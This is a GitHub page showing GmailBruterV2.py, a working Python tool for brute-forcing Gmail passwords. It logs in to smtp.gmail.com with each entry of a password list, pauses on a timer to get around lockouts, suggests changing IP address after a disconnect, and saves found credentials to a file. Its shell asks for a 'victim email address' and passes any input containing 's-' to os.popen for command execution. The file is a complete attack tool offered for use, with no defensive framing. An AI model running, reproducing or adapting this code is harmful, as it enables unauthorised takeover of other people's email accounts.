-
Notifications
You must be signed in to change notification settings - Fork 63
/
GmailBruterV2.py
175 lines (161 loc) · 5.72 KB
/
GmailBruterV2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
import smtplib , os , sys , time
Count = 0
_Count = 0
def Banner():
Ban = "\n\t\t\t[>] SimpleGMailBruter [<]\n"; print(Ban)
def StartBruteAccount(Passlist,account,SMTPServer,Count,_Count,Time):
with open('{0}'.format(Passlist),'r') as PasswordsFile:
for Password in PasswordsFile:
Password = Password.rstrip("\n")
try:
SMTPServer.login(account,Password)
print("[+] Valid Password Has Been Found: {0}, For: {1}".format(Password,account))
# Create Data File!
with open('credits.txt' , 'a') as DataFile:
DataFile.write("\n--------------------------------------->"); DataFile.write("[+] Email: {0}\n".format(account)); DataFile.write("[+] Password: {0}\n".format(Password)); DataFile.write("--------------------------------------->");DataFile.close()
exit()
except smtplib.SMTPAuthenticationError:
Count += 1; _Count += 1
if Count == 20:
print("\n[!] Sleeping For {0} Seconds.".format(str(Time))); time.sleep(int(Time)); Count = 0
SMTPServer.close()
SMTPServer = StartSMTPServiceForGmail()
else:
print("\rBad Password: {0}".format(Password + " ") , end="")
sys.stdout.flush()
except Exception as e:
if "please run connect() first" in str(e):
SMTPServer.close()
print("\nThe SMTP Server Disconnected. Please Run The Tool Again After Changing Your IP Address Or After Waiting Sometime"); exit()
else:
print("Error: " + str(e))
def StartSMTPServiceForGmail():
SMTPServer = smtplib.SMTP('smtp.gmail.com', 587)
SMTPServer.ehlo()
SMTPServer.starttls()
return SMTPServer
def HelpGuide():
print("\nHelp Guide For GmailBruterV2.")
print("Commands For Shell:")
print("\thelp\t\t--\tTo Show This Messages")
print("\tset target\t--\tTo Set The Victim Email Address")
print("\tset time\t--\tTo Set Time Between Every 10 Faild Passwords")
print("\tset list\t--\tTo Set PassList Name ")
print("\tshow target\t--\tTo Show You Current Target ")
print("\tshow time\t--\tTo Show You Current Time ")
print("\tshow list\t--\tTo Show You Current List ")
print("\tload\t\t--\tLoad Local Config For Settings")
print("\tstart\t\t--\tTo Start Brute Force Attack\n")
print("\texit\t\t--\tClose The Shell")
def ContactMe():
Gmail = "[email protected]" # Don't perform the brute-force attacks on my email.
def StartShell():
# store how many times the user pressed Ctrl + C
AbortCount = 0
Commands = []
Account = ''
Time = ''
PassList = ''
with open(os.path.join("data" , "Commands") ,'r') as CommandsFile:
for Command in CommandsFile:
Command = Command.rstrip("\n")
Commands.append(Command)
while True:
# init variable to store user input
ShellResponse = ''
try:
# get input from user
ShellResponse = input("root@GmailBruter: ")
# handle Ctrl + C
except KeyboardInterrupt:
# increment AbortCount
AbortCount += 1
# print \n to print the new shell line on the next line
print()
# if the user pressed Ctrl + C two times
if AbortCount >= 2:
# print hint
print("[!] Press Ctrl + D or enter 'exit' to abort the program.")
# reset abortcount
AbortCount = 0
continue
# handle Ctrl + D
# Ctrl + D normally indicated the end of a file
# this is why python throws an EOFError
except EOFError:
print()
exit()
if ShellResponse.lower().replace(' ' , '') not in Commands:
if "s-" in ShellResponse.lower():
Command = ShellResponse.split("-"); Command = Command[1]
Results = os.popen(Command).read()
print("Command:" + Command)
print("Results: \n{0}".format(Results))
else:
print("Can't find the command: '{0}'".format(ShellResponse))
elif ShellResponse.lower() == "help":
HelpGuide()
elif ShellResponse.lower().replace(' ' , '') == "settarget":
Account = input("Target: ")
elif ShellResponse.lower().replace(' ' , '') == "settime":
Time = input("Time: ")
elif ShellResponse.lower().replace(' ' , '') == "setlist":
PassList = input("List: ")
elif ShellResponse.lower().replace(' ' , '') == "showtarget":
if Account == '':
print("[-] There's no target on the settings")
else:
print("Target: " + Account)
elif ShellResponse.lower().replace(' ' , '') == "showtime":
if Time == '':
print("[-] There's no time has been set")
else:
print("Time: " + Time)
elif ShellResponse.lower().replace(' ' , '') == "showlist":
if PassList == '':
print("[-] You didn't select a list")
else:
print("List: " + PassList)
elif ShellResponse.lower() == "start":
StartSMTPServiceForGmail()
Service = StartSMTPServiceForGmail()
if Account == '':
print("[!] Set Target!")
break
elif PassList == '':
print("[!] Set List!")
break
elif Time == '':
print("[!] Set Time!")
break
else:
StartBruteAccount(PassList,Account,Service,Count,_Count,Time)
elif ShellResponse.lower() == "exit":
exit()
elif ShellResponse.lower() == "load":
Config = input("Path: ")
if os.path.exists(Config):
Settings = open(Config , 'r')
for Line in Settings:
Line = Line.rstrip("\n"); Options = Line.split(":")
try:
if Options[0] == "email":
Account = Options[1]
print("Target: {0}".format(Options[1]))
elif Options[0] == "list":
PassList = Options[1]
print("List: {0}".format(PassList))
elif Options[0] == "time":
Time = Options[1]
print("Time: {0}".format(Time))
else:
print("[-] Invalid Config. Please check it again.")
except Exception:
print("[-] Invalid Config. Please check it again.")
else:
print("[-] The config file you selected doesn't exists")
else:
pass
# Start
Banner()
StartShell()